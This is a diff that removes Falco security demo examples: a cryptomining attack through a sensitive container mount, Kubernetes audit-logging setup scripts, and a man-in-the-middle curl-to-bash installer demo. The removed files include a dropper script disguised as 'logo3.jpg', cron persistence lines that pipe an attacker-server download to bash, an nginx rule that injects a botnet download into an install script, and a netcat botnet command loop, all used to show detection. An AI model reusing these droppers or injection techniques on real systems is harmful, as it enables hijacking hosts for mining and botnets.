-host-machine_1     | /var/tmp
-host-machine_1     | runing.....
-```
-
-### Observe Falco detecting malicious activity
-
-To observe Falco detecting the malicious activity, you can look for `falco_1` lines in the output. Falco will detect the container launch with the sensitive mount:
-
-```
-falco_1            | 22:37:24.478583438: Informational Container with sensitive mount started (user=root command=runc:[1:CHILD] init docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
-falco_1            | 22:37:24.479565025: Informational Container with sensitive mount started (user=root command=sh -c echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && sleep 300 docker123321-mysql (id=97587afcf89c) image=alpine:latest mounts=/etc:/mnt/etc::true:rprivate)
-```
-
-### Cleanup
-
-To tear down the environment, stop the script using ctrl-C and remove everything using `docker-compose -f demo.yml down -v`.
-
--- a/examples/bad-mount-cryptomining/attacker-nginx.conf
+++ b/examples/bad-mount-cryptomining/attacker-nginx.conf
@@ -1,14 +0,0 @@
-server {
-    listen       8220;
-    server_name  localhost;
-
-    location / {
-        root   /usr/share/nginx/html;
-        index  index.html index.htm;
-    }
-
-    error_page   500 502 503 504  /50x.html;
-    location = /50x.html {
-        root   /usr/share/nginx/html;
-    }
-}
--- a/examples/bad-mount-cryptomining/attacker_files/config_1.json
+++ b/examples/bad-mount-cryptomining/attacker_files/config_1.json
@@ -1 +0,0 @@
-{"config": "some-bitcoin-miner-config-goes-here"}
--- a/examples/bad-mount-cryptomining/attacker_files/logo3.jpg
+++ b/examples/bad-mount-cryptomining/attacker_files/logo3.jpg
@@ -1,64 +0,0 @@
-#!/bin/sh
-echo "***Checking for existing Miner program"
-ps -fe|grep jaav |grep -v grep
-if [ $? -eq 0 ]
-then
-pwd
-else
-
-echo "***Killing competing Miner programs"
-rm -rf /var/tmp/ysjswirmrm.conf
-rm -rf /var/tmp/sshd
-ps auxf|grep -v grep|grep -v ovpvwbvtat|grep "/tmp/"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "\./"|grep 'httpd.conf'|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "\-p x"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "cryptonight"|awk '{print $2}'|xargs -r kill -9
-ps auxf|grep -v grep|grep "ysjswirmrm"|awk '{print $2}'|xargs -r kill -9
-
-echo "***Reinstalling cron job to run Miner program"
-crontab -r || true && \
-echo "* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s" >> /tmp/cron || true && \
-crontab /tmp/cron || true && \
-rm -rf /tmp/cron || true
-
-echo "***Configuring Miner program"
-curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
-curl -so /var/tmp/jaav http://attacker-server:8220/minerd
-chmod 777 /var/tmp/jaav
-cd /var/tmp
-
-echo "***Configuring system for Miner program"
-cd /var/tmp
-proc=`grep -c ^processor /proc/cpuinfo`
-cores=$(($proc+1))
-num=$(($cores*3))
-/sbin/sysctl -w vm.nr_hugepages=$num
-
-echo "***Running Miner program"
-nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
-fi
-
-echo "***Ensuring Miner program is alive"
-ps -fe|grep jaav |grep -v grep
-if [ $? -eq 0 ]
-then
-pwd
-else
-
-echo "***Reconfiguring Miner program"
-curl -so /var/tmp/config.json http://attacker-server:8220/config_1.json
-curl -so /var/tmp/jaav http://attacker-server:8220/minerd
-chmod 777 /var/tmp/jaav
-cd /var/tmp
-
-echo "***Reconfiguring system for Miner program"
-proc=`grep -c ^processor /proc/cpuinfo`
-cores=$(($proc+1))
-num=$(($cores*3))
-/sbin/sysctl -w vm.nr_hugepages=$num
-
-echo "***Restarting Miner program"
-nohup ./jaav -c config.json -t `echo $cores` >/dev/null &
-fi
-echo "runing....."
--- a/examples/bad-mount-cryptomining/attacker_files/minerd
+++ b/examples/bad-mount-cryptomining/attacker_files/minerd
@@ -1,7 +0,0 @@
-#!/bin/bash
-
-while true; do
-      echo "Mining bitcoins..."
-      sleep 60
-done
-
--- a/examples/bad-mount-cryptomining/demo.yml
+++ b/examples/bad-mount-cryptomining/demo.yml
@@ -1,41 +0,0 @@
-version: '3'
-
-volumes:
-  host-filesystem:
-  docker-socket:
-
-services:
-  host-machine:
-    privileged: true
-    build:
-      context: ${PWD}/host-machine
-      dockerfile: ${PWD}/host-machine/Dockerfile
-    volumes:
-      - host-filesystem:/etc
-      - docker-socket:/var/run
-    ports:
-      - "2375:2375"
-    depends_on:
-      - "falco"
-
-  attacker-server:
-    image: nginx:latest
-    ports:
-      - "8220:8220"
-    volumes:
-      - ${PWD}/attacker_files:/usr/share/nginx/html
-      - ${PWD}/attacker-nginx.conf:/etc/nginx/conf.d/default.conf
-    depends_on:
-      - "falco"
-
-  falco:
-    image: falcosecurity/falco:latest
-    privileged: true
-    volumes:
-      - docker-socket:/host/var/run
-      - /dev:/host/dev
-      - /proc:/host/proc:ro
-      - /boot:/host/boot:ro
-      - /lib/modules:/host/lib/modules:ro
-      - /usr:/host/usr:ro
-    tty: true
--- a/examples/bad-mount-cryptomining/docker123321-mysql-container.json
+++ b/examples/bad-mount-cryptomining/docker123321-mysql-container.json
@@ -1,7 +0,0 @@
-{
-    "Cmd": ["/bin/sh", "-c", "echo '* * * * * curl -s http://attacker-server:8220/logo3.jpg | bash -s' >> /mnt/etc/crontabs/root && touch /mnt/etc/crontabs/cron.update && sleep 300"],
-    "Image": "alpine:latest",
-    "HostConfig": {
-	"Binds": ["/etc:/mnt/etc"]
-    }
-}
--- a/examples/bad-mount-cryptomining/host-machine/Dockerfile
+++ b/examples/bad-mount-cryptomining/host-machine/Dockerfile
@@ -1,12 +0,0 @@
-FROM docker:stable-dind
-
-RUN set -ex \
-    && apk add --no-cache \
-    bash curl
-
-COPY start-cron-and-dind.sh /usr/local/bin
-
-ENTRYPOINT ["start-cron-and-dind.sh"]
-CMD []
-
-
--- a/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh
+++ b/examples/bad-mount-cryptomining/host-machine/start-cron-and-dind.sh
@@ -1,11 +0,0 @@
-#!/bin/sh
-
-# Start docker-in-docker, but backgrounded with its output still going
-# to stdout/stderr.
-dockerd-entrypoint.sh &
-
-# Start cron in the foreground with a moderate level of debugging to
-# see job output.
-crond -f -d 6
-
-
--- a/examples/bad-mount-cryptomining/launch_malicious_container.sh
+++ b/examples/bad-mount-cryptomining/launch_malicious_container.sh
@@ -1,14 +0,0 @@
-#!/bin/sh
-
-echo "Pulling alpine:latest image to docker-in-docker instance"
-curl -X POST 'http://localhost:2375/images/create?fromImage=alpine&tag=latest'
-
-echo "Creating container mounting /etc from host-machine"
-curl -H 'Content-Type: application/json' -d @docker123321-mysql-container.json -X POST 'http://localhost:2375/containers/create?&name=docker123321-mysql'
-
-echo "Running container mounting /etc from host-machine"
-curl -H 'Content-Type: application/json' -X POST 'http://localhost:2375/containers/docker123321-mysql/start'
-
-
-
-
--- a/examples/k8s_audit_config/README.md
+++ b/examples/k8s_audit_config/README.md
@@ -1,136 +0,0 @@
-This page describes how to get [Kubernetes Auditing](https://kubernetes.io/docs/tasks/debug-application-cluster/audit) working with Falco.
-Either using static audit backends in Kubernetes 1.11, or in Kubernetes 1.13 with dynamic sink which configures webhook backends through an AuditSink API object.
-
-<!-- toc -->
-
- [Instructions for Kubernetes 1.11](#instructions-for-kubernetes-111)
-  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster)
-  * [Define your audit policy and webhook configuration](#define-your-audit-policy-and-webhook-configuration)
-  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging)
-  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco)
- [Instructions for Kubernetes 1.13](#instructions-for-kubernetes-113)
-  * [Deploy Falco to your Kubernetes cluster](#deploy-falco-to-your-kubernetes-cluster-1)
-  * [Restart the API Server to enable Audit Logging](#restart-the-api-server-to-enable-audit-logging-1)
-  * [Deploy AuditSink objects](#deploy-auditsink-objects)
-  * [Observe Kubernetes audit events at falco](#observe-kubernetes-audit-events-at-falco-1)
- [Instructions for Kubernetes 1.13 with dynamic webhook and local log file](#instructions-for-kubernetes-113-with-dynamic-webhook-and-local-log-file)
-
-<!-- tocstop -->
-
-## Instructions for Kubernetes 1.11
-
-The main steps are:
-
-1. Deploy Falco to your Kubernetes cluster
-1. Define your audit policy and webhook configuration
-1. Restart the API Server to enable Audit Logging
-1. Observe Kubernetes audit events at falco
-
-### Deploy Falco to your Kubernetes cluster
-
-Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a falco service account, service, configmap, and daemonset.
-
-### Define your audit policy and webhook configuration
-
-The files in this directory can be used to configure Kubernetes audit logging. The relevant files are:
-
-* [audit-policy.yaml](./audit-policy.yaml): The Kubernetes audit log configuration we used to create the rules in [k8s_audit_rules.yaml](../../rules/k8s_audit_rules.yaml).
-* [webhook-config.yaml.in](./webhook-config.yaml.in): A (templated) webhook configuration that sends audit events to an ip associated with the falco service, port 8765. It is templated in that the *actual* IP is defined in an environment variable `FALCO_SERVICE_CLUSTERIP`, which can be plugged in using a program like `envsubst`.
-
-Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the `ClusterIP`s associated with those services are routable.
-
-```
-FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < webhook-config.yaml.in > webhook-config.yaml
-```
-
-### Restart the API Server to enable Audit Logging
-
-A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling audit log support for the apiserver, including copying the audit policy/webhook files to the apiserver machine, modifying the apiserver command line to add `--audit-log-path`, `--audit-policy-file`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
-
-It is run as `bash ./enable-k8s-audit.sh <variant> static`. `<variant>` can be one of the following:
-
-* `minikube`
-* `kops`
-
-When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
-
-Its output looks like this:
-
-```
-$ bash enable-k8s-audit.sh minikube static
-***Copying apiserver config patch script to apiserver...
-apiserver-config.patch.sh                                                                   100% 1190     1.2MB/s   00:00
-***Copying audit policy/webhook files to apiserver...
-audit-policy.yaml                                                                           100% 2519     1.2MB/s   00:00
-webhook-config.yaml                                                                         100%  248   362.0KB/s   00:00
-***Modifying k8s apiserver config (will result in apiserver restarting)...
-***Done!
-$
-```
-### Observe Kubernetes audit events at falco
-
-Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
-
-## Instructions for Kubernetes 1.13
-
-The main steps are:
-
-1. Deploy Falco to your Kubernetes cluster
-2. Restart the API Server to enable Audit Logging
-3. Deploy the AuditSink object for your audit policy and webhook configuration
-4. Observe Kubernetes audit events at falco
-
-### Deploy Falco to your Kubernetes cluster
-
-Follow the [Kubernetes Using Daemonset](../../integrations/k8s-using-daemonset/README.md) instructions to create a Falco service account, service, configmap, and daemonset.
-
-### Restart the API Server to enable Audit Logging
-
-A script [enable-k8s-audit.sh](./enable-k8s-audit.sh) performs the necessary steps of enabling dynamic audit support for the apiserver by modifying the apiserver command line to add `--audit-dynamic-configuration`, `--feature-gates=DynamicAuditing=true`, etc. arguments, etc. (For minikube, ideally you'd be able to pass all these options directly on the `minikube start` command line, but manual patching is necessary. See [this issue](https://github.com/kubernetes/minikube/issues/2741) for more details.)
-
-It is run as `bash ./enable-k8s-audit.sh <variant> dynamic`. `<variant>` can be one of the following:
-
-* `minikube`
-* `kops`
-
-When running with `variant` equal to `kops`, you must either modify the script to specify the kops apiserver hostname or set it via the environment: `APISERVER_HOST=api.my-kops-cluster.com bash ./enable-k8s-audit.sh kops`
-
-Its output looks like this:
-
-```
-$ bash enable-k8s-audit.sh minikube dynamic
-***Copying apiserver config patch script to apiserver...
-apiserver-config.patch.sh                                                                   100% 1190     1.2MB/s   00:00
-***Modifying k8s apiserver config (will result in apiserver restarting)...
-***Done!
-$
-```
-
-### Deploy AuditSink objects
-
-[audit-sink.yaml.in](./audit-sink.yaml.in), in this directory, is a template audit sink configuration that defines the dynamic audit policy and webhook to route Kubernetes audit events to Falco.
-
-Run the following to fill in the template file with the `ClusterIP` IP address you created with the `falco-service` service above. Although services like `falco-service.default.svc.cluster.local` can not be resolved from the kube-apiserver container within the minikube vm (they're run as pods but not *really* a part of the cluster), the ClusterIPs associated with those services are routable.
-
-```
-FALCO_SERVICE_CLUSTERIP=$(kubectl get service falco-service -o=jsonpath={.spec.clusterIP}) envsubst < audit-sink.yaml.in > audit-sink.yaml
-```
-
-### Observe Kubernetes audit events at falco
-
-Kubernetes audit events will then be routed to the falco daemonset within the cluster, which you can observe via `kubectl logs -f $(kubectl get pods -l app=falco-example -o jsonpath={.items[0].metadata.name})`.
-
-## Instructions for Kubernetes 1.13 with dynamic webhook and local log file
-
-If you want to use a mix of `AuditSink` for remote audit events as well as a local audit log file, you can run `enable-k8s-audit.sh` with the `"dynamic+log"` argument e.g. `bash ./enable-k8s-audit.sh <variant> dynamic+log`. This will enable dynamic audit logs as well as a static audit log to a local file. Its output looks like this:
-
-```
-***Copying apiserver config patch script to apiserver...
-apiserver-config.patch.sh                                                                          100% 2211   662.9KB/s   00:00
-***Copying audit policy file to apiserver...
-audit-policy.yaml                                                                                  100% 2519   847.7KB/s   00:00
-***Modifying k8s apiserver config (will result in apiserver restarting)...
-***Done!
-```
-
-The audit log will be available on the apiserver host at `/var/lib/k8s_audit/audit.log`.
--- a/examples/k8s_audit_config/apiserver-config.patch.sh
+++ b/examples/k8s_audit_config/apiserver-config.patch.sh
@@ -1,72 +0,0 @@
-#!/usr/bin/env bash
-
-set -euo pipefail
-
-IFS=''
-
-FILENAME=${1:-/etc/kubernetes/manifests/kube-apiserver.yaml}
-VARIANT=${2:-minikube}
-AUDIT_TYPE=${3:-static}
-
-if [ "$AUDIT_TYPE" == "static" ]; then
-    if grep audit-webhook-config-file "$FILENAME" ; then
-	echo audit-webhook patch already applied
-	exit 0
-    fi
-else
-    if grep audit-dynamic-configuration "$FILENAME" ; then
-	echo audit-dynamic-configuration patch already applied
-	exit 0
-    fi
-fi
-
-TMPFILE="/tmp/kube-apiserver.yaml.patched"
-rm -f "$TMPFILE"
-
-APISERVER_PREFIX="    -"
-APISERVER_LINE="- kube-apiserver"
-
-if [ "$VARIANT" == "kops" ]; then
-    APISERVER_PREFIX="     "
-    APISERVER_LINE="/usr/local/bin/kube-apiserver"
-fi
-
-while read -r LINE
-do
-    echo "$LINE" >> "$TMPFILE"
-    case "$LINE" in
-        *$APISERVER_LINE*)
-	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "$APISERVER_PREFIX --audit-log-path=/var/lib/k8s_audit/audit.log" >> "$TMPFILE"
-		echo "$APISERVER_PREFIX --audit-policy-file=/var/lib/k8s_audit/audit-policy.yaml" >> "$TMPFILE"
-		if [[ $AUDIT_TYPE == "static" ]]; then
-		    echo "$APISERVER_PREFIX --audit-webhook-config-file=/var/lib/k8s_audit/webhook-config.yaml" >> "$TMPFILE"
-		    echo "$APISERVER_PREFIX --audit-webhook-batch-max-wait=5s" >> "$TMPFILE"
-		fi
-	    fi
-	    if [[ ($AUDIT_TYPE == "dynamic" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "$APISERVER_PREFIX --audit-dynamic-configuration" >> "$TMPFILE"
-		echo "$APISERVER_PREFIX --feature-gates=DynamicAuditing=true" >> "$TMPFILE"
-		echo "$APISERVER_PREFIX --runtime-config=auditregistration.k8s.io/v1alpha1=true" >> "$TMPFILE"
-	    fi
-            ;;
-        *"volumeMounts:"*)
-	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "    - mountPath: /var/lib/k8s_audit/" >> "$TMPFILE"
-		echo "      name: data" >> "$TMPFILE"
-	    fi
-            ;;
-        *"volumes:"*)
-	    if [[ ($AUDIT_TYPE == "static" || $AUDIT_TYPE == "dynamic+log") ]]; then
-		echo "  - hostPath:" >> "$TMPFILE"
-		echo "      path: /var/lib/k8s_audit" >> "$TMPFILE"
-		echo "    name: data" >> "$TMPFILE"
-	    fi
-            ;;
-
-    esac
-done < "$FILENAME"
-
-cp "$FILENAME" "/tmp/kube-apiserver.yaml.original"
-cp "$TMPFILE" "$FILENAME"
-
--- a/examples/k8s_audit_config/audit-policy.yaml
+++ b/examples/k8s_audit_config/audit-policy.yaml
@@ -1,76 +0,0 @@
-apiVersion: audit.k8s.io/v1beta1 # This is required.
-kind: Policy
-# Don't generate audit events for all requests in RequestReceived stage.
-omitStages:
-  - "RequestReceived"
-rules:
-  # Log pod changes at RequestResponse level
-  - level: RequestResponse
-    resources:
-    - group: ""
-      # Resource "pods" doesn't match requests to any subresource of pods,
-      # which is consistent with the RBAC policy.
-      resources: ["pods", "deployments"]
-
-  - level: RequestResponse
-    resources:
-    - group: "rbac.authorization.k8s.io"
-      # Resource "pods" doesn't match requests to any subresource of pods,
-      # which is consistent with the RBAC policy.
-      resources: ["clusterroles", "clusterrolebindings"]
-
-  # Log "pods/log", "pods/status" at Metadata level
-  - level: Metadata
-    resources:
-    - group: ""
-      resources: ["pods/log", "pods/status"]
-
-  # Don't log requests to a configmap called "controller-leader"
-  - level: None
-    resources:
-    - group: ""
-      resources: ["configmaps"]
-      resourceNames: ["controller-leader"]
-
-  # Don't log watch requests by the "system:kube-proxy" on endpoints or services
-  - level: None
-    users: ["system:kube-proxy"]
-    verbs: ["watch"]
-    resources:
-    - group: "" # core API group
-      resources: ["endpoints", "services"]
-
-  # Don't log authenticated requests to certain non-resource URL paths.
-  - level: None
-    userGroups: ["system:authenticated"]
-    nonResourceURLs:
-    - "/api*" # Wildcard matching.
-    - "/version"
-
-  # Log the request body of configmap changes in kube-system.
-  - level: Request
-    resources:
-    - group: "" # core API group
-      resources: ["configmaps"]
-    # This rule only applies to resources in the "kube-system" namespace.
-    # The empty string "" can be used to select non-namespaced resources.
-    namespaces: ["kube-system"]
-
-  # Log configmap and secret changes in all other namespaces at the RequestResponse level.
-  - level: RequestResponse
-    resources:
-    - group: "" # core API group
-      resources: ["secrets", "configmaps"]
-
-  # Log all other resources in core and extensions at the Request level.
-  - level: Request
-    resources:
-    - group: "" # core API group
-    - group: "extensions" # Version of group should NOT be included.
-
-  # A catch-all rule to log all other requests at the Metadata level.
-  - level: Metadata
-    # Long-running requests like watches that fall under this rule will not
-    # generate an audit event in RequestReceived.
-    omitStages:
-      - "RequestReceived"
--- a/examples/k8s_audit_config/audit-sink.yaml.in
+++ b/examples/k8s_audit_config/audit-sink.yaml.in
@@ -1,16 +0,0 @@
-apiVersion: auditregistration.k8s.io/v1alpha1
-kind: AuditSink
-metadata:
-  name: falco-audit-sink
-spec:
-  policy:
-    level: RequestResponse
-    stages:
-      - ResponseComplete
-      - ResponseStarted
-  webhook:
-    throttle:
-      qps: 10
-      burst: 15
-    clientConfig:
-      url: "http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit"
--- a/examples/k8s_audit_config/enable-k8s-audit.sh
+++ b/examples/k8s_audit_config/enable-k8s-audit.sh
@@ -1,46 +0,0 @@
-#!/usr/bin/env bash
-
-set -euo pipefail
-
-VARIANT=${1:-minikube}
-AUDIT_TYPE=${2:-static}
-
-if [ "$VARIANT" == "minikube" ]; then
-    APISERVER_HOST=$(minikube ip)
-    SSH_KEY=$(minikube ssh-key)
-    SSH_USER="docker"
-    MANIFEST="/etc/kubernetes/manifests/kube-apiserver.yaml"
-fi
-
-if [ "$VARIANT" == "kops" ]; then
-    # APISERVER_HOST=api.your-kops-cluster-name.com
-    SSH_KEY=~/.ssh/id_rsa
-    SSH_USER="admin"
-    MANIFEST=/etc/kubernetes/manifests/kube-apiserver.manifest
-
-    if [ -z "${APISERVER_HOST+xxx}" ]; then
-	echo "***You must specify APISERVER_HOST with the name of your kops api server"
-	exit 1
-    fi
-fi
-
-echo "***Copying apiserver config patch script to apiserver..."
-ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo mkdir -p /var/lib/k8s_audit && sudo chown $SSH_USER /var/lib/k8s_audit"
-scp -i $SSH_KEY apiserver-config.patch.sh "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-
-if [ "$AUDIT_TYPE" == "static" ]; then
-    echo "***Copying audit policy/webhook files to apiserver..."
-    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-    scp -i $SSH_KEY webhook-config.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-fi
-
-if [ "$AUDIT_TYPE" == "dynamic+log" ]; then
-    echo "***Copying audit policy file to apiserver..."
-    scp -i $SSH_KEY audit-policy.yaml "$SSH_USER@$APISERVER_HOST:/var/lib/k8s_audit"
-fi
-
-echo "***Modifying k8s apiserver config (will result in apiserver restarting)..."
-
-ssh -i $SSH_KEY "$SSH_USER@$APISERVER_HOST" "sudo bash /var/lib/k8s_audit/apiserver-config.patch.sh $MANIFEST $VARIANT $AUDIT_TYPE"
-
-echo "***Done!"
--- a/examples/k8s_audit_config/webhook-config.yaml.in
+++ b/examples/k8s_audit_config/webhook-config.yaml.in
@@ -1,14 +0,0 @@
-apiVersion: v1
-kind: Config
-clusters:
- name: falco
-  cluster:
-    server: http://$FALCO_SERVICE_CLUSTERIP:8765/k8s_audit
-contexts:
- context:
-    cluster: falco
-    user: ""
-  name: default-context
-current-context: default-context
-preferences: {}
-users: []
--- a/examples/mitm-sh-installer/README.md
+++ b/examples/mitm-sh-installer/README.md
@@ -1,78 +0,0 @@
-# Demo of falco with man-in-the-middle attacks on installation scripts
-
-For context, see the corresponding [blog post](http://sysdig.com/blog/making-curl-to-bash-safer) for this demo.
-
-## Demo architecture
-
-### Initial setup
-
-Make sure no prior `botnet_client.py` processes are lying around.
-
-### Start everything using docker-compose
-
-From this directory, run the following:
-
-```
-$ docker-compose -f demo.yml up
-```
-
-This starts the following containers:
-* apache: the legitimate web server, serving files from `.../mitm-sh-installer/web_root`, specifically the file `install-software.sh`.
-* nginx: the reverse proxy, configured with the config file `.../mitm-sh-installer/nginx.conf`.
-* evil_apache: the "evil" web server, serving files from `.../mitm-sh-installer/evil_web_root`, specifically the file `botnet_client.py`.
-* attacker_botnet_master: constantly trying to contact the botnet_client.py process.
-* falco: will detect the activities of botnet_client.py.
-
-### Download `install-software.sh`, see botnet client running
-
-Run the following to fetch and execute the installation script,
-which also installs the botnet client:
-
-```
-$ curl http://localhost/install-software.sh | bash
-```
-
-You'll see messages about installing the software. (The script doesn't actually install anything, the messages are just for demonstration purposes).
-
-Now look for all python processes and you'll see the botnet client running. You can also telnet to port 1234:
-
-```
-$ ps auxww  | grep python
-...
-root   19983  0.1  0.4  33992  8832 pts/1    S    13:34   0:00 python ./botnet_client.py
-
-$ telnet localhost 1234
-Trying ::1...
-Trying 127.0.0.1...
-Connected to localhost.
-Escape character is '^]'.
-```
-
-You'll also see messages in the docker-compose output showing that attacker_botnet_master can reach the client:
-
-```
-attacker_botnet_master | Trying to contact compromised machine...
-attacker_botnet_master | Waiting for botnet command and control commands...
-attacker_botnet_master | Ok, will execute "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec"
-attacker_botnet_master | **********Contacted compromised machine, sent botnet commands
-```
-
-At this point, kill the botnet_client.py process to clean things up.
-
-### Run installation script again using `fbash`, note falco warnings.
-
-If you run the installation script again:
-
-```
-curl http://localhost/install-software.sh | ./fbash
-```
-
-In the docker-compose output, you'll see the following falco warnings:
-
-```
-falco                  | 23:19:56.528652447: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=127.0.0.1:43639->127.0.0.1:9090)
-falco                  | 23:19:56.528667589: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=)
-falco                  | 23:19:56.530758087: Warning Outbound connection on non-http(s) port by a process in a fbash session (command=curl -so ./botnet_client.py http://localhost:9090/botnet_client.py connection=::1:41996->::1:9090)
-falco                  | 23:19:56.605318716: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
-falco                  | 23:19:56.605323967: Warning Unexpected listen call by a process in a fbash session (command=python ./botnet_client.py)
-```
--- a/examples/mitm-sh-installer/botnet_master.sh
+++ b/examples/mitm-sh-installer/botnet_master.sh
@@ -1,7 +0,0 @@
-#!/bin/sh
-
-while true; do
-    echo "Trying to contact compromised machine..."
-    echo "ddos target=10.2.4.5 duration=3000s rate=5000 m/sec" | nc localhost 1234 && echo "**********Contacted compromised machine, sent botnet commands"
-    sleep 5
-done
--- a/examples/mitm-sh-installer/demo.yml
+++ b/examples/mitm-sh-installer/demo.yml
@@ -1,51 +0,0 @@
-# Owned by software vendor, serving install-software.sh.
-apache:
-  container_name: apache
-  image: httpd:2.4
-  volumes:
-        - ${PWD}/web_root:/usr/local/apache2/htdocs
-
-# Owned by software vendor, compromised by attacker.
-nginx:
-  container_name: mitm_nginx
-  image: nginx:latest
-  links:
-    - apache
-  ports:
-      - "80:80"
-  volumes:
-        - ${PWD}/nginx.conf:/etc/nginx/nginx.conf:ro
-
-# Owned by attacker.
-evil_apache:
-  container_name: evil_apache
-  image: httpd:2.4
-  volumes:
-        - ${PWD}/evil_web_root:/usr/local/apache2/htdocs
-  ports:
-      - "9090:80"
-
-# Owned by attacker, constantly trying to contact client.
-attacker_botnet_master:
-  container_name: attacker_botnet_master
-  image: alpine:latest
-  net: host
-  volumes:
-    - ${PWD}/botnet_master.sh:/tmp/botnet_master.sh
-  command:
-    - /tmp/botnet_master.sh
-
-# Owned by client, detects attack by attacker
-falco:
-  container_name: falco
-  image: falcosecurity/falco:latest
-  privileged: true
-  volumes:
-    - /var/run/docker.sock:/host/var/run/docker.sock
-    - /dev:/host/dev
-    - /proc:/host/proc:ro
-    - /boot:/host/boot:ro
-    - /lib/modules:/host/lib/modules:ro
-    - /usr:/host/usr:ro
-    - ${PWD}/../../rules/falco_rules.yaml:/etc/falco_rules.yaml
-  tty: true
--- a/examples/mitm-sh-installer/evil_web_root/botnet_client.py
+++ b/examples/mitm-sh-installer/evil_web_root/botnet_client.py
@@ -1,18 +0,0 @@
-import socket;
-import signal;
-import os;
-
-os.close(0);
-os.close(1);
-os.close(2);
-
-signal.signal(signal.SIGINT,signal.SIG_IGN);
-serversocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
-serversocket.bind(('0.0.0.0', 1234))
-serversocket.listen(5);
-while 1:
-    (clientsocket, address) = serversocket.accept();
-    clientsocket.send('Waiting for botnet command and control commands...\n');
-    command = clientsocket.recv(1024)
-    clientsocket.send('Ok, will execute "{}"\n'.format(command.strip()))
-    clientsocket.close()
--- a/examples/mitm-sh-installer/fbash
+++ b/examples/mitm-sh-installer/fbash
@@ -1,15 +0,0 @@
-#!/bin/bash
-
-SID=`ps --no-heading -o sess --pid $$`
-
-if [ $SID -ne $$ ]; then
-    # Not currently a session leader? Run a copy of ourself in a new
-    # session, with copies of stdin/stdout/stderr.
-    setsid $0 $@ < /dev/stdin 1> /dev/stdout 2> /dev/stderr &
-    FBASH=$!
-    trap "kill $FBASH; exit" SIGINT SIGTERM
-    wait $FBASH
-else
-    # Just evaluate the commands (from stdin)
-    source /dev/stdin
-fi
--- a/examples/mitm-sh-installer/nginx.conf
+++ b/examples/mitm-sh-installer/nginx.conf
@@ -1,12 +0,0 @@
-http {
-    server {
-        location / {
-            sub_filter_types '*';
-            sub_filter 'function install_deb {' 'curl -so ./botnet_client.py http://localhost:9090/botnet_client.py && python ./botnet_client.py &\nfunction install_deb {';
-            sub_filter_once off;
-            proxy_pass http://apache:80;
-        }
-    }
-}
-events {
-}
--- a/examples/mitm-sh-installer/web_root/install-software.sh
+++ b/examples/mitm-sh-installer/web_root/install-software.sh
@@ -1,156 +0,0 @@
-#!/bin/bash
-#
-# Copyright (C) 2019 The Falco Authors.
-#
-#
-# Licensed under the Apache License, Version 2.0 (the "License");
-# you may not use this file except in compliance with the License.
-# You may obtain a copy of the License at
-#
-#     http://www.apache.org/licenses/LICENSE-2.0
-#
-# Unless required by applicable law or agreed to in writing, software
-# distributed under the License is distributed on an "AS IS" BASIS,
-# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-# See the License for the specific language governing permissions and
-# limitations under the License.
-#
-
-set -e
-
-function install_rpm {
-	if ! hash curl > /dev/null 2>&1; then
-		echo "* Installing curl"
-		yum -q -y install curl
-	fi
-
-	echo "*** Installing my-software public key"
-	# A rpm --import command would normally be here
-
-	echo "*** Installing my-software repository"
-	# A curl path-to.repo <some url> would normally be here
-
-	echo "*** Installing my-software"
-	# A yum -q -y install my-software command would normally be here
-
-	echo "*** my-software Installed!"
-}
-
-function install_deb {
-	export DEBIAN_FRONTEND=noninteractive
-
-	if ! hash curl > /dev/null 2>&1; then
-		echo "* Installing curl"
-		apt-get -qq -y install curl < /dev/null
-	fi
-
-	echo "*** Installing my-software public key"
-	# A curl <url> | apt-key add - command would normally be here
-
-	echo "*** Installing my-software repository"
-	# A curl path-to.list <some url> would normally be here
-
